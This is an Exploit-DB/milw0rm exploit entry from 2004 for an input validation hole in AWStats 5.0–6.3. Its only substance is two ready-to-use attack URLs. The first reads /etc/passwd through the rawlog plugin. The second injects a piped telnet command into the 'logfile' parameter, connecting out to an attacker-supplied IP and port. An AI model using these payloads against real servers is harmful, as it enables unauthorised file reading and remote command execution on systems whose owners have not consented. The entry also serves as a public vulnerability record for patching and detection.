AWStats (5.0-6.3) Input Validation Hole in 'logfile'



EDB-ID: 407 CVE: N/A OSVDB-ID: 9109
Author: Johnathan Bat Published: 2004-08-21 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]